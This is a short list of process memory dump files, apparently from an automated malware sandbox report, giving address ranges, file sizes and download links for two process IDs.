memory/3816-20-0x00007FFE06B80000-0x00007FFE07641000-memory.dmp

Filesize
10.8MB

Download
memory/3816-14-0x00007FFE06B80000-0x00007FFE07641000-memory.dmp

Filesize
10.8MB

Download
memory/4864-22-0x00007FFE1BCB0000-0x00007FFE1BDDE000-memory.dmp

Filesize
1.2MB

Download
memory/4864-24-0x00007FFE16D20000-0x00007FFE16DC5000-memory.dmp

Filesize
660KB

Download
memory/4864-23-0x00007FFE1BC90000-0x00007FFE1BCB0000-memory.dmp

Filesize
128KB

Download